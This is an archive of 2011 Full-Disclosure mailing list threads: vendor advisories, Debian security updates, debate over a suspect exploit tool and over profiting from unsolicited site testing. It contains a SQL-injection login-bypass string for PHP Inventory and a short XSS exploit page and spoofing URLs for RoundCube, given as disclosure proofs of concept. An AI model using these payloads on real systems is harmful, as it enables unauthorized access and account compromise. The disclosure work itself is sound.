[Full-disclosure] PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability
Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability Advisory ID:INFOSERVE-ADV2011-08 Author: Stefan Schurtz Contact:secur...@infoserve.de Affected Software: Successfully tested on PHP Inventory 1.3.1 Vendor URL: http://www.phpwares.com/ Vendor Status: fixed CVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597 == Vulnerability Description == PHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability == PoC-Exploit == http://[target]/php-inventory/index.php // with 'magic_quotes_gpc = Off' USER NAME = ' or 1=1# or USER NAME = admin PASSWORD = ' or 1=1# = Solution = Update to the latest version 1.3.2 Disclosure Timeline 29-Nov-2011 - informed vendor (contact form) 30-Nov-2011 - vendor fix Credits Vulnerabilitiy found and advisory written by the INFOSERVE security team. === References === http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt http://www.exploit-db.com/exploits/10370/ http://secunia.com/advisories/37672/ Kind regards, Stefan Schurtz | SECURE INFRASTRUCTURE INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schu...@infoserve.de | www.infoserve.de Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort: Saarbrücken Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599 smime.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2354-1] cups security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2354-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez November 28, 2011 http://www.debian.org/security/faq - - Package: cups Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-2896 CVE-2011-3170 Petr Sklenar and Tomas Hoger discovered that missing input sanitising in the GIF decoder inside the Cups printing system could lead to denial of service or potentially arbitrary code execution through crafted GIF files. For the oldstable distribution (lenny), this problem has been fixed in version 1.3.8-1+lenny10. For the stable distribution (squeeze), this problem has been fixed in version 1.4.4-7+squeeze1. For the testing and unstable distribution (sid), this problem has been fixed in version 1.5.0-8. We recommend that you upgrade your cups packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk7WagQACgkQXm3vHE4uylpgngCgy+xPdr3SGtgK+5zLkrIm2fHE YdEAoJP3bofxwm/6M+akx0DSTXnRC183 =aY5X -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Client aproach
Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now i would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder? On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario -- Samuel Lavitt Senior Security Architect +358-40-084-7257 SSH.com Securing the path to your information assets ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] News issue of PenTest Magazine - 21 pages of free content.
Hi everyone! New issue of PenTest Magazine is out! 21 pages of free content, feat. full PainPill by Dean Bushmiller, where Dean talks about penetration testing business and law - this is a must for everyone in the business! The link to download is below: http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free! Enjoy reading! -- Maciej Kozuszek PenTest Magazine Managing Editor Software Media Sp z o.o. www.pentestmag.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
Hi Security Experts, I have a question about the security track record of Indian IT vendors like Infosys, TCS, Wipro etc. An article about Indian IT vendors by an ex-employee of one of these companies is circulating in the different NITs (National Institute of Technology) of India today. My doubt is about this part of the article from http://susam.in/blog/re-infosys-tcs-or-wipro/#engineers : Many claimed that I am wrong about the poor standard of training in Infosys, TCS, or Wipro. I must tell them that I have attended some of these training programmes. Among the many horror stories pertaining to training in these companies, I'll share only one with you to make my point. In the training assessments, the instructors set question papers containing problems with code that invokes undefined behaviour and ask you to predict its output. 'It Invokes undefined behaviour' is not provided as an option you can select as the correct answer. Such training and knowledge is not only inaccurate but also very dangerous if you care about robustness and security of the software you create. I am trying to verify this by using Secunia. I can find plenty of Microsoft and Google security vulnerabilities [ http://secunia.com/advisories/search/?search=Microsoft+Google http://secunia.com/advisories/search/?search=Microsoft+Google%C2%A0] but none for Infosys TCS or Wipro [ http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro%C2%A0]. What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
From one of the earlier emails to the list: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a... On Wed, Nov 30, 2011 at 10:58 PM, Gino g...@1337.io wrote: Seems to have Juan Succo written all over it On 11/30/11 1:49 AM, Mario Vilas wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com mailto:nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg Download it directly from the main site: http://www.exploitpack.com We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Q. How many Prolog programmers does it take to change a lightbulb? A. No. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Indeed, Juan Sacco is the author. It's pretty clear from the about page on the site, and the whois record on the domain. I don't think it's meant to be a secret. Now, I know his track record on this list is less than ideal, but let's try to be professional and wait for the source code to show up before criticizing it. :) On Thu, Dec 1, 2011 at 5:11 AM, Stefan Edwards saedwards@gmail.comwrote: From one of the earlier emails to the list: Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a... On Wed, Nov 30, 2011 at 10:58 PM, Gino g...@1337.io wrote: Seems to have Juan Succo written all over it On 11/30/11 1:49 AM, Mario Vilas wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario On Wed, Nov 30, 2011 at 5:13 AM, nore...@exploitpack.com mailto:nore...@exploitpack.com wrote: Exploit Pack is an open source security tool that will help you test the security of your computer or servers. It combines the benefits of a Java GUI, Python as engine and the latest exploits on the wild. It has an IDE to make the task of developing new exploits easier, Instant Search and XML-based modules. The latest release, version 1.1 is available for download right away! Take a look of the new features on this quick video: http://www.youtube.com/watch?v=DPX7JdvTRmg Download it directly from the main site: http://www.exploitpack.com We are looking for investors or donations to maintain this project alive! Thank you! The only one who has daily updates Exploit Pack ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Q. How many Prolog programmers does it take to change a lightbulb? A. No. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
how not to do it: http://www.securityweek.com/hungarian-man-pleads-guilty-hacking-marriott-systems-demanding-job-it-dept http://www.infoworld.com/d/security-central/hungarian-man-charged-hacking-sony-ericsson-site-047 On Wed, Nov 30, 2011 at 11:56 AM, Miguel Lopes theoverb...@gmail.comwrote: Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now i would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
On Thu, 01 Dec 2011 07:24:14 +0530, Wonder Guy said: What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors? Secunia doesn't care about little fish no matter which pond they're in. If an Indian software vendor created a browser and shipped as many copies as IE or Firefox has shipped, I'm sure Secunia would show some hits. Pick a few dozen Indian prodcuts that have shipped in fairly high volume. Then pick a similar sized sample of non-Indian products that shipped in similar volumes, and see what the expected number of Secunia entries would be for each sample. pgpNmRUrhTGyY.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Everyone should remember that this software is made by the same people who make Insect Pro. Read into that what you will. On Nov 30, 2011, at 7:49 AM, Samuel Lavitt samuel.lav...@ssh.com wrote: Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder? On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario -- Samuel Lavitt Senior Security Architect +358-40-084-7257 SSH.com Securing the path to your information assets ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
You are in a tough spot. In general, the level of access you granted yourself in an unauthorized testing of the site would be considered illegal. You may recall the whole 'or 1=1 thing. So your approach to the client is all he would need to contact authorities if he so chose. Arguably, the best thing to do here would be to contact the owner and just give them the information for free, and do so in a way that does not implicate you in any wrongdoing. Or simply drop it. Moving forward, you might want to consider changing your business model so that you are hired to perform web app assessments before you start breaking laws. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Miguel Lopes Sent: Wednesday, November 30, 2011 2:56 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Client aproach Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now i would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
Send site owner/admin anon email and leave it at that.. as Thor mentioned give em the info for free! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
Wonder guy, the basis of your conclusion are as ridiculous as your question. Microsoft and Google are products companies. Atleast TCS and Wipro are not. They are into offshore and managed business domains. Infosys is also into making custom solutions and they are all closed source. And none of the companies that you mentioned cater to the such a large audience as MS and Google do. Are you going to start looking for every single company in secunia and come up with such preposterous conclusions? - Wonderguy - TAS http://twitter.com/p0wnsauc3 -Original Message- From: Wonder Guy blrwonder...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Thu, 1 Dec 2011 07:24:14 To: Full-Disclosure@lists.grok.org.uk Subject: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Large password list
I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
Hi! I saw your message on FD and SF mailing list... So sorry for this.. But I didnt have the time to create the installer for win32, linux32/64 In fact.. I was playing my favourite MMORPG ( Lineage2 ) and they opened a new server yesterday so haha that keep me busy :p Anyway, that its planned to be done tonight! When I get back home.. Im at work right now :) Also I have the latest version on my laptop so I will upload it to Git Repo from home too! I will let you know when all of this is done! Thank you and again, sorry for this misunderstanding! and Oh! I created a blog to let the people now the status of this project, check it out: http://exploitpack.com/blog Hope you like it! Cheers Jsacco On 30.11.2011 06:49, Samuel Lavitt wrote: Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder? On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
dude, your meant to be PRO, i also tried to use your it to pull the latest files, and nothing there mate.not since, awhile ago... I also now have a copy of insectPRO , and am wondering, is your git able to update this for me.. am alittle worried ;p Altho on exploitpack.com/downloads/ there seems to be some ...interesting files... i have not yet opened... but i hope it is good stuff! On 2 December 2011 05:40, nore...@exploitpack.com wrote: Hi! I saw your message on FD and SF mailing list... So sorry for this.. But I didnt have the time to create the installer for win32, linux32/64 In fact.. I was playing my favourite MMORPG ( Lineage2 ) and they opened a new server yesterday so haha that keep me busy :p Anyway, that its planned to be done tonight! When I get back home.. Im at work right now :) Also I have the latest version on my laptop so I will upload it to Git Repo from home too! I will let you know when all of this is done! Thank you and again, sorry for this misunderstanding! and Oh! I created a blog to let the people now the status of this project, check it out: http://exploitpack.com/blog Hope you like it! Cheers Jsacco On 30.11.2011 06:49, Samuel Lavitt wrote: Hmm, only a Windows installer, and no actual source code. Just who is getting exploited here I wonder? On 11/30/2011 02:00 PM, full-disclosure-requ...@lists.grok.org.uk wrote: Hi, I'm afraid all the download links in that webpage seem to be broken, except for the Windows installer (which has a different version number than the rest of the downloads). Also, the github repository where you're hosting the source code appears to be empty. Cheers, -Mario ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Writing Self Modifying Code
On Wed, Nov 30, 2011 at 1:30 PM, Adam Behnke a...@infosecinstitute.com wrote: Hello full disclosureites, a new tutorial is available at InfoSec Institute ... Your thoughts? who was this content plagiarized from? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in RoundCube
Hello list! I want to warn you about multiple vulnerabilities in RoundCube. These are Brute Force, Content Spoofing, Cross-Site Scripting and Clickjacking vulnerabilities. CS and XSS are in TinyMCE, which is included with RoundCube. - Affected products: - Vulnerable are RoundCube 0.6 and previous versions (checked in 0.4-beta and 0.6). In last version RoundCube 0.6 uses moxieplayer.swf (instead of flv_player.swf). As the developers informed me, these vulnerabilities will be fixed in version RoundCube 0.7. -- Details: -- Brute Force (WASC-11): http://site/index.php Content Spoofing (WASC-12): Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay and startImage, which allows to spoof content of flash - i.e. by setting addresses of video and/or image files from other site. http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=falsestartImage=http://site2/1.jpg http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flvautoStart=falsestartImage=http://site2/1.jpg Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters thumbnail and url in xml-file accept arbitrary addresses). http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml File 1.xml: ?xml version=1.0 encoding=UTF-8? playlist item name=Content Spoofing thumbnail=1.jpg url=1.flv/ item name=Content Spoofing thumbnail=2.jpg url=2.flv/ /playlist XSS (WASC-08): If at the site at page with flv_player.swf (with parameter jsCallback=true, or if there is possibility to set this parameter for flv_player.swf) there is possibility to include JS code with function flvStart() and/or flvEnd() (via HTML Injection), then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack. Example of exploit: html body script function flvStart() { alert('XSS'); } function flvEnd() { alert('XSS'); } /script object width=50% height=50% param name=movie value=flv_player.swf?flvToPlay=1.flvjsCallback=true param name=quality value=high embed src=flv_player.swf?flvToPlay=1.flvjsCallback=true width=50% height=50% quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash; type=application/x-shockwave-flash/embed /object /body /html Content Spoofing (WASC-12): http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=1.flv This swf-file accepts arbitrary addresses in parameter url, which allows to spoof content of flash - i.e. by setting address of video file from other site. Clickjacking: RoundCube is vulnerable to remote login with using of Clickjacking (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008090.html). About such attacks I've wrote already in my article. In version RoundCube 0.6-RC there was added protection against Clickjacking attack (except above-mentioned login form), to which all functionality of the application is vulnerable. But the method is not effective enough, because it works only in new versions of some browsers, so all users of older browsers are unprotected. And old versions of RoundCube are fully vulnerable to Clickjacking. Timeline: 2011.10.15 - found vulnerabilities. 2011.10.18 - announced at my site. 2011.10.21 - informed developer of RoundCube. During my conversation with developer during October-November, he decided to fix them and was working on fixes for these holes. 2011.11.23 - developer of RoundCube informed that all fixes have been made and would be added to the next release RoundCube 0.7. 2011.11.30 - disclosed at my site. I mentioned about these vulnerabilities at my site: http://websecurity.com.ua/5448/ Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2356-1] openjdk-6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2356-1 secur...@debian.org http://www.debian.org/security/Florian Weimer December 01, 2011 http://www.debian.org/security/faq - - Package: openjdk-6 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3389 CVE-2011-3521 CVE-2011-3544 CVE-2011-3547 CVE-2011-3548 CVE-2011-3551 CVE-2011-3552 CVE-2011-3553 CVE-2011-3554 CVE-2011-3556 CVE-2011-3557 CVE-2011-3560 Several vulnerabilities have been discovered in OpenJDK, an implementation of the Java platform: CVE-2011-3389 The TLS implementation does not guard properly against certain chosen-plaintext attacks when block ciphers are used in CBC mode. CVE-2011-3521 The CORBA implementation contains a deserialization vulnerability in the IIOP implementation, allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3544 The Java scripting engine lacks necessary security manager checks, allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3547 The skip() method in java.io.InputStream uses a shared buffer, allowing untrusted Java code (such as applets) to access data that is skipped by other code. CVE-2011-3548 The java.awt.AWTKeyStroke class contains a flaw which allows untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3551 The Java2D C code contains an integer overflow which results in a heap-based buffer overflow, potentially allowing untrusted Java code (such as applets) to elevate its privileges. CVE-2011-3552 Malicous Java code can use up an excessive amount of UDP ports, leading to a denial of service. CVE-2011-3553 JAX-WS enables stack traces for certain server responses by default, potentially leaking sensitive information. CVE-2011-3554 JAR files in pack200 format are not properly checked for errors, potentially leading to arbitrary code execution when unpacking crafted pack200 files. CVE-2011-3556 The RMI Registry server lacks access restrictions on certain methods, allowing a remote client to execute arbitary code. CVE-2011-3557 The RMI Registry server fails to properly restrict privileges of untrusted Java code, allowing RMI clients to elevate their privileges on the RMI Registry server. CVE-2011-3560 The com.sun.net.ssl.HttpsURLConnection class does not perform proper security manager checks in the setSSLSocketFactory() method, allowing untrusted Java code to bypass security policy restrictions. For the stable distribution (squeeze), this problem has been fixed in version 6b18-1.8.10-0+squeeze1. For the testing distribution (wheezy) and the unstable distribution (sid), this problem has been fixed in version 6b23~pre11-1. We recommend that you upgrade your openjdk-6 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iQEbBAEBAgAGBQJO1+i7AAoJEL97/wQC1SS+fQcH9i6cLDKnMFiH5tzy7vm4v8qh VU0SVxYJivU+WIirETVqqaXxDQB6aZ+77RYrip1BbzSh1fp2l3lZXr6Vs2yHSBXt EQXTHbUwlVSQ6J+RzH4snndJ1SfCqKMeFd6jwGA5MLCfPAxDl4AzIEHBYTI4bAKR OInCSiQT5PwmYDwBfve5tgQISeqtjocomsxJUMDICfe2Vgfgvq+/nZqA9LHu5rdA Xn2zthSJwZCK5x+1yqxEadxZ1RxlMRdEOGaHw/GhK+eOP1ujSsRFLWiYLuPRRifY 7GwgDVrvUAqoQzZRI5HqJw6kcI9wV/c6C+oCT9cDAvVe4VOq2SzhneS8H3amqA== =Jadx -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Is FD no longer unmoderated?
On Thu, Dec 1, 2011 at 3:06 AM, valdis.kletni...@vt.edu wrote: On Thu, 01 Dec 2011 07:49:28 +0530, David Blanc said: A colleague of mine subscribed to FD recently and tried posting to it but every time he gets this message: The *list* isn't moderated. However, several *people* are, and they for the most part know who they are and why they're moderated. Erm, in March 2010 John Cartwright (list owner) had to introduce a sort of moderation-lite procedure to deal with the way (it seemed that) n3td3v avoided his ban by just signing up new user IDs with which to spew his nonsense once his primary ID was banned. *New* users are now moderated for a while after their initial signup (not sure whether a while means time, or post-count), until they have shown they're not an idiot. See http://seclists.org/fulldisclosure/2010/Mar/459 [Very good idea, IMHO, given the idiot factor that seems to show up here from time to time] Cheers Nick Boyce -- Leave the Olympics in Greece, where they belong. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New FREE security tool!
I saw your site got defaced today, mr your meant to be PRO. Maybe time for less posting and more edumacation ? On Thu, Dec 1, 2011 at 11:41 AM, xD 0x41 sec...@gmail.com wrote: dude, your meant to be PRO, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] InfoSec Southwest 2012 CFP
InfoSec Southwest 2012 Call for Papers March 30th through April 1st 2012, Austin, Texas http://infosecsouthwest.com/cfp.html The InfoSec Southwest staff are now soliciting papers to be presented at our 2012 conference to be held March 30th through April 1st 2012 in Austin, Texas. Who Should Submit InfoSec Southwest is intended to be a general security and hacking conference with no specific industry or topical focus. As such, nearly all topics (other than vendor pitches) are fair game and the attending audience is expected to span all demographics. Thus, we cordially invite anyone who has a paper to present to submit for inclusion in the conference. Conference Format InfoSec Southwest currently has two tracks slated for presentation. The first track is intended for traditional, full-length presentations and lectures. This is the track where lectures selected via the CFP process will be presented. The second track is modeled after our local AHA! (Austin Hackers Association) group's monthly meetings and is an open forum for first-come, first-served lighting and turbo talks. Please see the conference website's CFP page for our submission procedure and speaker remuneration information: http://infosecsouthwest.com/cfp.html Important Dates 2011.12.01: Call for Papers Opens 2011.01.01: Preferential First Round Speaker Selection Announced and Notifications Sent 2012.02.01: Call for Papers Deadline 2012.03.01: Final Speaker Selections Announced and Notifications Sent 2012.03.30: InfoSec Southwest 2012 Conference Registration and Reception 2012.03.31: InfoSec Southwest 2012 Conference Day 1 2012.04.01: InfoSec Southwest 2012 Conference Day 2 Thanks, -- I)ruid, C²ISSP dr...@caughq.org http://druid.caughq.org signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD ftpd and ProFTPd on FreeBSD remote r00t exploit
